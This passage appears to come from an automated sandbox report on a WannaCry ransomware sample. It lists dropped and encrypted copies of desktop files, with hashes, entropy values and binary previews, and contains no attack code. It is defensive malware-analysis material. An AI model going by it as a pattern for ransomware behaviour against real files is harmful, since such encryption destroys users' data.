Preview:	...jK.5..Z{..W.}... R.....Rvj@b,.te.....r@...Q...R.P..........8D.G#.a...K......6..N..W........C....Lo@..k...I..'.T..W1P.m......Qu....[..O.>.d._-.\|o.....-..\|....C..%b;.E7i.,.l<....^.".%_.M}.e.LFy .R.1.k=..8....A?W).kqE..z..z.lC5^7(o..v&i.p.C....k.!l..Q.=.^]...2;.A~...Y...:<Q......u...ai..#\|..(.o..Q..a +.R;.;]W....?..F}...H..f.n....\.LtV."... P..k..q...M.......#...G......PkH.. .=....G./C'.z)...2.w....M.C......Xu.$V!....`.G.T."0....GiOr..+n..:E....#...X.M6..&N....].+..](&...{.%..5.1..R..c.g(.4..(.RX...O..c`[\|/.7..w..w.C.>.E..9..S.2.....w..)0G\|'h9.9..v@...<..:.....E...4.m..G..O..R.~o...w..A...j...V_...S..8!..,.....E.s...b....N...F..8..s..{...vO...!!pM.j.Y...4X..-.D..?..T..b...r.i.#..qpHT..5.......$............0.#w}D...o.,j A.x..g2.n.YuQ...ap.....Z....i...8...uJ'..V...Hu..... .$h....t..J.....:.<........L......'..N;6..3.:....'.Y.(..?.%...%0......:U..0pF..emX.e."P2&.<dx...&m..n.}..9....o.?.....^.Y..6c.\w9M..=........d.t....T....J..;4.>..i

C:\Users\user\Desktop\GIGIYTFFYT\TQDFJHPUIU.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.856666803734533
Encrypted:	false
SSDEEP:	24:bkO4HG14De4mtiMBEXhI9SdD6yZknT3L7+u1y6WshGSuUUXGWpdM:bkYSD/2XOxrDAT3HrGSufX9Q
MD5:	284D9C0093FB5010853DE4D1B705E234
SHA1:	4BD752C96F5B9FFDA21F156F70A7EBB2F8A4363F
SHA-256:	6C05319AA0EC8B0EB378E760E56D96CEDDB70D0879B0B5973FEFD6CDB56AD295
SHA-512:	F8AB0FA8953C79CC32E160CEE94B0D1A3BFC3DDEF2D463105B6D9230F0C2A63446B2A77BF50A07833DCF9C0388777830F3A161911521F5A0FD9291D73736D466
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..........8>..$.QF]38......a./Q..;3.6t<.qe... ..'..F;.....i.eM).7.b......h..;..X$...z0.f..?.o)~......g._.}..+.cwdz...=.\m...... )S.." .......$1-.G.cG..[..$.,P..M....W].X.IDR0$..{.,YF.+.. ch....5.R.Cs.<.8e..j..8..G..R.#.uP-. y.]-.........Y..y............O.^as..s..<..=.f.,]........N]..\1.n.X)...jo......W..">.s?-..f..a9NF...Y.....O.`.;...b...uX...........G.A...+P?`o..o......E~L.....{U.\|.Y._...\%...M...p...t..Y)@1.4.........j&.w..m..!.~.EV.:..u.fR..GC4.@...k....f.A..d.#8.L.N...-...f9...8,....S.....m.%..C......B.9......G.:2.V.......;NO..da..?s..`.E....xR0k.\..)7'.l.?.vB.F.=.I.).s..u........k..M0U(.Ib%..x...$.#._........o.........v.!...........Uz.3.a...@.\..3....$..$.b>z.$...g.k.&..(N.-S...wP.Sx...(..Ia0.,b.)...\..R.....t.`.N..%....Z.........C6..A.`u...s....c2.3@..KG..$......./.u?.Q&.Sq.....$@.&......T.....]..PQ......7,..^.KA.%u...L..eBE$Q.-.....A...3zI.I...Ct8..>.:...."Uv.5........).>.sV.J.........G....+..p..+.Ov....GM6U_)B.

C:\Users\user\Desktop\GIGIYTFFYT\TQDFJHPUIU.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.856666803734533
Encrypted:	false
SSDEEP:	24:bkO4HG14De4mtiMBEXhI9SdD6yZknT3L7+u1y6WshGSuUUXGWpdM:bkYSD/2XOxrDAT3HrGSufX9Q
MD5:	284D9C0093FB5010853DE4D1B705E234
SHA1:	4BD752C96F5B9FFDA21F156F70A7EBB2F8A4363F
SHA-256:	6C05319AA0EC8B0EB378E760E56D96CEDDB70D0879B0B5973FEFD6CDB56AD295
SHA-512:	F8AB0FA8953C79CC32E160CEE94B0D1A3BFC3DDEF2D463105B6D9230F0C2A63446B2A77BF50A07833DCF9C0388777830F3A161911521F5A0FD9291D73736D466
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..........8>..$.QF]38......a./Q..;3.6t<.qe... ..'..F;.....i.eM).7.b......h..;..X$...z0.f..?.o)~......g._.}..+.cwdz...=.\m...... )S.." .......$1-.G.cG..[..$.,P..M....W].X.IDR0$..{.,YF.+.. ch....5.R.Cs.<.8e..j..8..G..R.#.uP-. y.]-.........Y..y............O.^as..s..<..=.f.,]........N]..\1.n.X)...jo......W..">.s?-..f..a9NF...Y.....O.`.;...b...uX...........G.A...+P?`o..o......E~L.....{U.\|.Y._...\%...M...p...t..Y)@1.4.........j&.w..m..!.~.EV.:..u.fR..GC4.@...k....f.A..d.#8.L.N...-...f9...8,....S.....m.%..C......B.9......G.:2.V.......;NO..da..?s..`.E....xR0k.\..)7'.l.?.vB.F.=.I.).s..u........k..M0U(.Ib%..x...$.#._........o.........v.!...........Uz.3.a...@.\..3....$..$.b>z.$...g.k.&..(N.-S...wP.Sx...(..Ia0.,b.)...\..R.....t.`.N..%....Z.........C6..A.`u...s....c2.3@..KG..$......./.u?.Q&.Sq.....$@.&......T.....]..PQ......7,..^.KA.%u...L..eBE$Q.-.....A...3zI.I...Ct8..>.:...."Uv.5........).>.sV.J.........G....+..p..+.Ov....GM6U_)B.

C:\Users\user\Desktop\GIGIYTFFYT\UNKRLCVOHV.mp3

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.813502207412918
Encrypted:	false
SSDEEP:	24:fK99GVoWiAmD9qJHZlYyX5EABUBH7tsos5SLNL:CGVB1+9qJHx5UBeosgR
MD5:	CB052D30BBE8BF5BC8C146AE9562180F
SHA1:	D153C4B69840A33D557D028A4D4955B7A5332C25
SHA-256:	90382984E100BA6201D8DCDA5E11BADE7F8EC6D531F4F4E7A111C60746F47904
SHA-512:	D3761D58D3EFC74405D1D475CA25408764F2C250F6F39E29CA724F9BC5E6513E8E9AF82E6D9AE66CF9EDEBBFF720ED236FCB67586AF6E61B44A3D3BD2CA2D281
Malicious:	false
Reputation:	unknown
Preview:	u....8.\|.....t.......?...4.>F.G..z.....v)...w./!Ve.....S-..NGZL.(.'CL...X.44..B;..;i..@i....A..E`....8..`..b....Z..i{..A.U.....Ft?6D:....'.......V....+o.....L...R.2......n..?w.!2......F.......mb.2x6..\|.S`q2F..G...#....B=k.4..m.U{G.9.;.4......#...+.d.....{..k..e...Q4m).qI..&7W,a.Q....q....N.zq.U.)h.`Y......EW.p.}%3..>..<....P.KS..t.y..N=..?Pn.X.o...E..$y..nr^...].........G.DT....w.O.....T..n.Ud.^.......=.P.%.....%....F.._UQ...~...:.K..X..b...y...%..5..B.x._X.H`..!....s.....^8.8c...7.r.h...h....h.-%....1?..rU8..+.....-........%.-o....I....=2...U4.;E..~..+..ED...6/.IUS..B....(.......Mn)....m....*.. ...Elx9..}.K`a.&%...d..l..w,..V.r....g.2...NN../.9.x..[f..y~...6..!..9...A.QDY.U.,X_.@Y..........X.6.M.O.j.#.R. ....:..\|..........6PJS..;.2....8..'.....{UTT.U.0b..r(vJ....4..#].pBN.%M...y_.S.5b^I.....6G..... ....V.~..zb{.V.Y.&.r=..].rR].m.g.t1...)0.f...DX..Y.+?:.G[C..........s,.U.N..H8.........8g..rt..12..Z..m)"..) (...K

C:\Users\user\Desktop\GIGIYTFFYT\UNKRLCVOHV.mp3.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.838422938766995
Encrypted:	false
SSDEEP:	24:bkaXQs6usFEmsJfVAzkWJdpAJYYResAZkNJbCXoxP5dx3OoT+LvVREBLwAy1L/Ug:bkw56uGkmzhpgTeHZkXWYhvYoT0v8e1x
MD5:	F4D8368E62E2F9B4C81A6B7DEB14117E
SHA1:	0A63102FD55DBB3F44CEF06A47DFBD9BF7394076
SHA-256:	A3E2A424D4184C3EF23D311182FB65F76879831028519925BC86E51E44CFFE2F
SHA-512:	BF9B5C9DE9747E3DFF3D3F1B4207C5B3F3E48926FDBB2E6EF4661DC7EA24557D6268A678F81D81D8D0A4BBC060B78CC3E9900EAE7B4A3C1FE8EB349EB3D705E7
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......5g)0".`...iR. .8.g....W.D.Z.e.k:LM)1s..~../....qm...2}g.Z7b.7'=mn...d]....]...."..{..4\|..7...`(%.x...}............QQ.....q.i....-z.}.........OgzYx.C.U].....F.7.......8.....J.Z.O.8Z......].f.w..2.)N.Q.8....8>...,.g.=Q..v`.C.g.?z...Q................'sT.&..,..TT...4.^.?..!.....K.....!....cW..V..\|..s.....IG.$ C.X.xZa..=.....G.a....;.z.4.E...t C....8.o.5..f..\|^j.....M...". .T.8n..../.%......8.<=.DR......2..C3.M..'..@.1...m...c.\...@.<.....r........... ..e.......Fv...m...R....7.s0M.}RG..?....A...U.R ........l.G.k....w.1....`4j..kx.kV.L.. 7lk.....y....)..B..Y..,.<e.6vn...Y..s..pL.....[#\|@..ie'z.m..<..!...v...rH.d...p.B?.....K#u...m..m.AM.........v~6..2...e.y..}.$?..P..FUy\;...9@.....#.o.+.oP...].....}....U.zd.o.'.x..:.+...e..\|....5yz.[.....c.@zkP._..}Z.[kX...y.."....g*.[.......u..9.Bj._.i%...XQ.N.&......j.....7X..s.[....Aw..7.lz#..3...$[g.@.e..q/8D..._.........B..K...7W..L~~.v?..3.A^(tf.'.`..%.Ddt.4.w..A9..,. ...z$.!:.;

C:\Users\user\Desktop\GIGIYTFFYT\UNKRLCVOHV.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.838422938766995
Encrypted:	false
SSDEEP:	24:bkaXQs6usFEmsJfVAzkWJdpAJYYResAZkNJbCXoxP5dx3OoT+LvVREBLwAy1L/Ug:bkw56uGkmzhpgTeHZkXWYhvYoT0v8e1x
MD5:	F4D8368E62E2F9B4C81A6B7DEB14117E
SHA1:	0A63102FD55DBB3F44CEF06A47DFBD9BF7394076
SHA-256:	A3E2A424D4184C3EF23D311182FB65F76879831028519925BC86E51E44CFFE2F
SHA-512:	BF9B5C9DE9747E3DFF3D3F1B4207C5B3F3E48926FDBB2E6EF4661DC7EA24557D6268A678F81D81D8D0A4BBC060B78CC3E9900EAE7B4A3C1FE8EB349EB3D705E7
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......5g)0".`...iR. .8.g....W.D.Z.e.k:LM)1s..~../....qm...2}g.Z7b.7'=mn...d]....]...."..{..4\|..7...`(%.x...}............QQ.....q.i....-z.}.........OgzYx.C.U].....F.7.......8.....J.Z.O.8Z......].f.w..2.)N.Q.8....8>...,.g.=Q..v`.C.g.?z...Q................'sT.&..,..TT...4.^.?..!.....K.....!....cW..V..\|..s.....IG.$ C.X.xZa..=.....G.a....;.z.4.E...t C....8.o.5..f..\|^j.....M...". .T.8n..../.%......8.<=.DR......2..C3.M..'..@.1...m...c.\...@.<.....r........... ..e.......Fv...m...R....7.s0M.}RG..?....A...U.R ........l.G.k....w.1....`4j..kx.kV.L.. 7lk.....y....)..B..Y..,.<e.6vn...Y..s..pL.....[#\|@..ie'z.m..<..!...v...rH.d...p.B?.....K#u...m..m.AM.........v~6..2...e.y..}.$?..P..FUy\;...9@.....#.o.+.oP...].....}....U.zd.o.'.x..:.+...e..\|....5yz.[.....c.@zkP._..}Z.[kX...y.."....g*.[.......u..9.Bj._.i%...XQ.N.&......j.....7X..s.[....Aw..7.lz#..3...$[g.@.e..q/8D..._.........B..K...7W..L~~.v?..3.A^(tf.'.`..%.Ddt.4.w..A9..,. ...z$.!:.;

C:\Users\user\Desktop\GIGIYTFFYT\ZIPXYXWIOY.jpg

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.801985468700334
Encrypted:	false
SSDEEP:	24:0KmZupmnYjWn8MHttP7Uy8yz5oGqPHUhB2L4Dws:0KmSmYjQvHnz8yVse2LVs
MD5:	2602BFEF83508B0DAB03374BF360C4AE
SHA1:	BFF917BEB2F4F0E9973A3F37922F12245AD5A07E
SHA-256:	2A59EE47E94A9684EDC25A1F8CC2216EBA8D455D653A121665694553B0559CB4
SHA-512:	368C1230B1C03CBFFA0F4497B4D74B6025E865C0ADE9A93D6452D9AA9AEC7342B22BE3904E6646FA4D417F3C0A0AA2CDB73CB3122445E19E495481CD88BCDEC0
Malicious:	true
Reputation:	unknown
Preview:	..E/d.!........>....U5-...../F."...5.. W..-.....L...E6.$...h......"....W.E.rC......2.`......5.VB....o..cEy........H.`cH..Y....)..6..:..d...8..@..i`Z.W..Ro...N...ai...k..9O..O.}tB.(:..~..'.y6.i.......j..{%SF...{.L]W...z.....U....-....S.......mgu;...'F....f.m.'.Rh5..}..........z.f%.jv...M.....t_.6...o...A....=..:4..,_P....Z...s&.<.\.....t?~go...........f....t.]......xE !6S..9.......-.Q...2a..o..y...O..C..._!.........B...!....gz..6.......&I.[..G.w#.vt..l....9..Y.,.&.......:...../...+}@{.....:.Z..-..g...(.....s@..}.y4q..JmR. ....X.p.#z.\|N..I+....$.;.3J..dU..r"-.....Qd.J.........%F.F...C:M.....)...(Dl..m..l..SNm0..R.....OX.H..8..mH.......8t.tV..5..o...A.....F..........`Qyx....5....8d.s#g.{.......y.....W$..0..4........0..zb0..s...wM......U.9.)...H...?{6I.XLPKF...7_......s.........9..mwt.+.x.?k....A.ls...Y....\|.&..=x...2Z.wBId..."_..#.... .Yd....ZU.....^P..rcYC[.'...u*......X...=.....oC=Eo.F.H.j9;H.......J.........,bA..q..Q0...ym....?....{1(

C:\Users\user\Desktop\GIGIYTFFYT\ZIPXYXWIOY.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.836210093095604
Encrypted:	false
SSDEEP:	24:bk3vWxW1+x9XO06sw7TJjH8sjaVTV6sv3Yx6JvmBgCkDKGYCtn:bk3tgePhPV8smhcsv3YxyiMDKGfl
MD5:	58F9EFEFDC825282D7B63B5909E59870
SHA1:	97080AD60BFC3FF63CC450A7B5700D97D6401B31
SHA-256:	ED796D5CC6E428A88871FEC5818FEFB071DBAC33E824ED987E6DEE54EF52504C
SHA-512:	2A2929D99CDCBAD38F5F35F49C5E30B014677AB8B70997897B258A612B95391EAF24D0065F03F9AEE930FFCCEB54BA07675B0BF83B4D309394BA46C6A64118B0
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........@.2q..B<..%..Z..j.m?.....5!.v?c......%...........'V.;..f...j2..?..........H-.@7..SOo9.....V!(....Z.a.. J...F.K.....P.WY....t.ay.........\|<.u2..!.^.R.(';i..\|4..Km.$......X..._w...=(....sX.Lt...yi.z.i<...?8...o.MW..Y.I..(l..c..m..}.5&r..EJ...................6.Oti4....ZR&...~+nD..S.g..q......^..lA......[..c..&.a./@!...~....[;.....p...P..\.....\.rT`."#O..T....>.H.&.e.m....S...$.za.w....4NR.4.07......)H.wwD..........h9g........!.=8J.t...<.!.7Rl..k>.<...qBY~y.i{.>..>. ..v.....;..`.......i'{.b@..M\[Nm\|R/e]_......T.........D.....e.\|.....g.?..V..^&.....(=.v..We..S =S....%._..i368.....<O.......U.YZ..}.T.T..={`.h`uP!.=o.....{....FML.....$.>s.........."M..6........JuQN..e@..O_k{V..&.%.....Y....JH..@#"..C...G!.....V.....'$...9...Y.......m.:..=...&_...C+F.}....dD2...U......X..../AQ.1..W...Mm.lr..T..=.;.{..+.KkU..K.4<g+..`h.'HAH...0!..wX.D....-...h...u.k\|..}...O.....0...'.%~.CW....<..]v....6.tw...k..L8&ZR.C...}.}.u.....2H....(..g...t.

C:\Users\user\Desktop\GIGIYTFFYT\ZIPXYXWIOY.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.836210093095604
Encrypted:	false
SSDEEP:	24:bk3vWxW1+x9XO06sw7TJjH8sjaVTV6sv3Yx6JvmBgCkDKGYCtn:bk3tgePhPV8smhcsv3YxyiMDKGfl
MD5:	58F9EFEFDC825282D7B63B5909E59870
SHA1:	97080AD60BFC3FF63CC450A7B5700D97D6401B31
SHA-256:	ED796D5CC6E428A88871FEC5818FEFB071DBAC33E824ED987E6DEE54EF52504C
SHA-512:	2A2929D99CDCBAD38F5F35F49C5E30B014677AB8B70997897B258A612B95391EAF24D0065F03F9AEE930FFCCEB54BA07675B0BF83B4D309394BA46C6A64118B0
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........@.2q..B<..%..Z..j.m?.....5!.v?c......%...........'V.;..f...j2..?..........H-.@7..SOo9.....V!(....Z.a.. J...F.K.....P.WY....t.ay.........\|<.u2..!.^.R.(';i..\|4..Km.$......X..._w...=(....sX.Lt...yi.z.i<...?8...o.MW..Y.I..(l..c..m..}.5&r..EJ...................6.Oti4....ZR&...~+nD..S.g..q......^..lA......[..c..&.a./@!...~....[;.....p...P..\.....\.rT`."#O..T....>.H.&.e.m....S...$.za.w....4NR.4.07......)H.wwD..........h9g........!.=8J.t...<.!.7Rl..k>.<...qBY~y.i{.>..>. ..v.....;..`.......i'{.b@..M\[Nm\|R/e]_......T.........D.....e.\|.....g.?..V..^&.....(=.v..We..S =S....%._..i368.....<O.......U.YZ..}.T.T..={`.h`uP!.=o.....{....FML.....$.>s.........."M..6........JuQN..e@..O_k{V..&.%.....Y....JH..@#"..C...G!.....V.....'$...9...Y.......m.:..=...&_...C+F.}....dD2...U......X..../AQ.1..W...Mm.lr..T..=.;.{..+.KkU..K.4<g+..`h.'HAH...0!..wX.D....-...h...u.k\|..}...O.....0...'.%~.CW....<..]v....6.tw...k..L8&ZR.C...}.}.u.....2H....(..g...t.

C:\Users\user\Desktop\JDDHMPCDUJ.png

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.778033759865869
Encrypted:	false
SSDEEP:	24:hEDgTdSBdoml0amZ33QAWrVM7Mwurx5Jvrtw8/4i1yb0r:hE0SB282Z33Q/GZur7hT3k4r
MD5:	1B52119CB562E32CC9F550860E9B2348
SHA1:	7DF505714BA34A1B4C29F417CCC104DEC5E053B3
SHA-256:	B2677E3400EBEF1C5239287478C144D8B2885D26FED9DCCEC87491964611F51F
SHA-512:	BB287F927FE0FADEEC062A414C88162C8B16ABA461C34C4BDDC26AE8FA981B17C641D01B864481FDA03A3CAC59814D6A59E46E44E2DA46459D5AF3D565748075
Malicious:	false
Reputation:	unknown
Preview:	.tG.}..Q.v....&...^F..k.r.....h....k.&,v...B$....wUV.....l..Q...l..sC..@......P .`6,U1YF..n.@..H.G..0..-..+.,Q.h....$..M..............#m..;....A.P&.8.Lz.cg..d...8...c,.{oi...7Y......'`......L....S..;7Kl....Q.L.t...jk...HK....=.8......]L...2........@....yV..K.>.!a.@H)...P.EE...+x...7.C.m..........uG.:Y.)Z..T.......W.$.XNW.e.l.......=.2#.../.......>.).P\|s,......TBx..%.8..t.r;.^.&.68.2..{..S4.j"&..+....T.;.....u..XXv...s..jrvc.:.>v......}...H..eb.fmEw...:QZ.....&..>.......6..e.S..6]...=.........\|W.5Y.0.X......^i,..S..a~_.=..b.C....?....e.....>...@.....T ...ic.&Aw..DL...lr.(G.....c..@>..)....=...t/R...7......Lg>#...s.t........ri.B\.........3..m.4...F..^...T&..v..7../)....[.iN@.Gl.0#.>.....=A@C..vB.t(#Y]a5f..h..?}j.....Y1.bntDn...y.e....?^..A.A^,.I....~...J....#ReZ.o.._...D.NbF...AzF...=bC. ...'.\T..f.c..y..~u.F.e.....2x.S?....?.#\h._../.9.F.5\|..n`.N[.5.#?..Z.qH...8N*7..r H.u9R.mskT...._.je.....GU&onC1.X.P.w.....Y.....f...@z.r#..........3.v....H..

C:\Users\user\Desktop\JDDHMPCDUJ.png.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.831252175540284
Encrypted:	false
SSDEEP:	24:bkjUtEwrRlPoWzej53PDh9NNM8BYba5eXk3qxGIvk9S6RgRPGP+TbmC:bkjmEwlPobbh9NNM8BYJXgq3/6RrP+TB
MD5:	759E9EAE3AF1F8C7C5AA73240AAC94E0
SHA1:	27E4ADDA36ABAA26E495CE5B1C5F8D2D45A43181
SHA-256:	F66F98740E491062DC4D921299F32B9C1FD84440E92809A03EA171ABC56917AB
SHA-512:	7FF8BF98A8417303E50BD3A8D8C0508895CE0EA70076EB60CFED73830B53B7599FB85A34CE2A2729F7D4598AE818D615491B5BDD2B7C4F4A7C23589EC5D38333
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....o.9yq......;.v.n.!.....n..M,......".l.0....,..U.[c.si.>#....VU.n(qkoh...6t.`..+0...g...<..&.....m5.....F...?.....E..T(./Vha.940'..Qwa6...r..1...Z[.v..Sk.9.(.5.O2Z}.....].R]-S..J/........D.v..&y..}.........+>l...^......y....[_.&.&\=.wm...g...ee]"58.J.............q.<S.VG.s...q.9cQ..&EG.1.tB...:b..!8.....r...8.......v..t.v...Q...F.-.hj..1i.I..d8...g...P..L......=Xc,c.o../...s!.....!.j...{.....xx}.gd].......3..`..@ ...8..'......}..........S.q."....n\..7............a'8...i....^Xy.q....e..]....h...Uup..0...M~..',{,...G..W.PhZT........[.j{.iA?RZ.{.me.H....9..r~.N...B.../....A..>...?y4Y.A.5.L..f......4u...`.....EF..l.<..L.9<.(......'c.V.....#.qy.....`...(..O.+X>c....2#<.....2..1.7....1[N.O...d..K....N...".N...o....Z~<."....>.......^...*..n. .Q.$?.3!h....2.j.>.F..#B....D...$.V.\<.,u..41......g...`;\r....}.m......Z.....O......_#......o.3..h3#?..U.;}...e...Q.!g.V.......(...H.o..S,C.'.(3...$...W.........5)_...m)l..Y.....C..<...Qu..<0..'.^.r..J[pBQ`

C:\Users\user\Desktop\JDDHMPCDUJ.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.831252175540284
Encrypted:	false
SSDEEP:	24:bkjUtEwrRlPoWzej53PDh9NNM8BYba5eXk3qxGIvk9S6RgRPGP+TbmC:bkjmEwlPobbh9NNM8BYJXgq3/6RrP+TB
MD5:	759E9EAE3AF1F8C7C5AA73240AAC94E0
SHA1:	27E4ADDA36ABAA26E495CE5B1C5F8D2D45A43181
SHA-256:	F66F98740E491062DC4D921299F32B9C1FD84440E92809A03EA171ABC56917AB
SHA-512:	7FF8BF98A8417303E50BD3A8D8C0508895CE0EA70076EB60CFED73830B53B7599FB85A34CE2A2729F7D4598AE818D615491B5BDD2B7C4F4A7C23589EC5D38333
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....o.9yq......;.v.n.!.....n..M,......".l.0....,..U.[c.si.>#....VU.n(qkoh...6t.`..+0...g...<..&.....m5.....F...?.....E..T(./Vha.940'..Qwa6...r..1...Z[.v..Sk.9.(.5.O2Z}.....].R]-S..J/........D.v..&y..}.........+>l...^......y....[_.&.&\=.wm...g...ee]"58.J.............q.<S.VG.s...q.9cQ..&EG.1.tB...:b..!8.....r...8.......v..t.v...Q...F.-.hj..1i.I..d8...g...P..L......=Xc,c.o../...s!.....!.j...{.....xx}.gd].......3..`..@ ...8..'......}..........S.q."....n\..7............a'8...i....^Xy.q....e..]....h...Uup..0...M~..',{,...G..W.PhZT........[.j{.iA?RZ.{.me.H....9..r~.N...B.../....A..>...?y4Y.A.5.L..f......4u...`.....EF..l.<..L.9<.(......'c.V.....#.qy.....`...(..O.+X>c....2#<.....2..1.7....1[N.O...d..K....N...".N...o....Z~<."....>.......^...*..n. .Q.$?.3!h....2.j.>.F..#B....D...$.V.\<.,u..41......g...`;\r....}.m......Z.....O......_#......o.3..h3#?..U.;}...e...Q.!g.V.......(...H.o..S,C.'.(3...$...W.........5)_...m)l..Y.....C..<...Qu..<0..'.^.r..J[pBQ`

C:\Users\user\Desktop\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.801892572315549
Encrypted:	false
SSDEEP:	24:wWatXRDOzUxOtCCTSRCmcsVjeciu5ir7QYYa1OZ:VatXZOz5pTYCmcspeC5ir7yn
MD5:	8F311F40B242195EBB0D2EB8C4D1F79F
SHA1:	04000F515EF3DA4491F862CC3A69C349124C138A
SHA-256:	029AAD35C246369ED6F677637117CE269FEC513547D61C96091F482913D6B5A9
SHA-512:	36C02E8902C7C8A479378CA0E4EA5FB49F94B0824F6CCCFBE2D7CEE58D3E0DD21EB175E531E0E9EE8D05FA002A93B302E7C8A2B6EB6D864F154A07643EF2E8F4
Malicious:	false
Reputation:	unknown
Preview:	.ua.....5,~A..e..}.._.6..C.....L....$ .....&\....J...bZ....HR..hUG.<..O#..h..$.._E.vU."..uU:W.E.Db..w......w.....e.^.6..I.".Pru(.p....^@..u;,.4.8p].Vo>.!&4....d..Te-.,......E...._..1...6S<CF.A.P......f....Z.....d....<.\|U....iz.?....n.= iz..W.j.).k6Y..>R......]+QA..x.?y..$..)c;..Q:.....z..J\-p.D..v../C..n.....3.....]...S.r.....y..{....3.U..s23.-..b..7.....}....0._....1).'.N,...<.?..S..(.$..\.@..%bk..~F........!.r....dOL...)%.Tw...k..b..?...TB../.w7P..=...:..z..p.SX.=.9.7._...D..i_....!a.R.a.VJ..Uty....[....g.r4]:.....\6b,.......7y.vt.Q<m.\A....s.E....YR....d...AQ.&.2......XV..A.,...../l6u.0.v..B...7/W.&.#..IA......Gr...................Z.h...I.'}..$0....HyHw.#.^ua...E.......5y......j.l.sd}...+......F.[..7.;..{)..f.....R`._....A$l.........e...1\\.2H...I.I...k.....RQEDd..k...(..:.R......h...&..."u9.&.P#....WL..&......4O..D.L.$...1.a^..9.}.2(.6.:....F1]P.}].Q.8o........].......[...xs..B....*..B.V...........V..-.YV33..............

C:\Users\user\Desktop\KLIZUSIQEN.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.87190700632229
Encrypted:	false
SSDEEP:	24:bkeVxjLRu2h5eVruouC7TfAgEuaefQt2WOjMP2s9KIB+z89uZJ+VHh4SzSOKoOpo:bkeVpLRdOzbtaFgW93+zIuZJq5moBOti
MD5:	422E9FE9A80738961F94201A50E99787
SHA1:	107897CFC8FD519FA521AA2257055E0F6D7D0C98
SHA-256:	78475A2A63D7B68F3C8817B37EFD28E5CF060E6A542FB72C79AFB8743D6A1F53
SHA-512:	734DC178894BDD2579EFBF79F0B4B52921EBF09759C4E58AEAAE93DA0D341439D0569DEFD406677732FBD51C55FA0D79999736AFC1A7F4932CA8B7A71A51CDC5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......vS.;...}G.......].S1=...?...nA...6]m.+..=.W........+.h..`......E<]....T.....U..%..?3L_........x..%..Z9.....E.kZ..&.C......A....Od....0k.".:"...-`.WR..).B..@..zX......A.Q<g.y..@..\|..<H.....f......L..\=5.v.0.HP.-s..7.O..j.F.Y.\...U...V'(...k..............."..$lH.n.f.#F....'...2.....rLF.>.(......XI....6!PQ...`......f..K..Q...p......^3..... ..A.a.)...U.....\ck....y...J...9........q....2....QHK.[q.B}..'..rG..~..v.8.....Ref..)`.. .zApP...`5.e.....H...'.h..H"YR6h.@......s....../.Tk.6-... .=\ZLw..?.e.\|..Ig[m..L..g../`...3)..x..E....'._U..C...50......W...t5.JUM;...`...~..\.Ue!lb.."...."'........o...h.a...c.2rqF.S.....KE..M.?z...w......OH......}H.b....=I+........n[...(.DLGur.....3.....;......D..6....<...,i.%..t.&@<.E.TE.......c........l..q.E...u.:....w._..L..u...GCu.....R.\...$.,......6...4w.G.Y9{.."t.%...UK.._.....\|\|......&.....Q;r..A@..1/G.$?..OY.......WxW.."I..9..-.....P...2.d+.g.{d.....{...z;3`.a..7E...<...i.&

C:\Users\user\Desktop\KLIZUSIQEN.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.87190700632229
Encrypted:	false
SSDEEP:	24:bkeVxjLRu2h5eVruouC7TfAgEuaefQt2WOjMP2s9KIB+z89uZJ+VHh4SzSOKoOpo:bkeVpLRdOzbtaFgW93+zIuZJq5moBOti
MD5:	422E9FE9A80738961F94201A50E99787
SHA1:	107897CFC8FD519FA521AA2257055E0F6D7D0C98
SHA-256:	78475A2A63D7B68F3C8817B37EFD28E5CF060E6A542FB72C79AFB8743D6A1F53
SHA-512:	734DC178894BDD2579EFBF79F0B4B52921EBF09759C4E58AEAAE93DA0D341439D0569DEFD406677732FBD51C55FA0D79999736AFC1A7F4932CA8B7A71A51CDC5
Malicious:	false
Reputation:	unknown
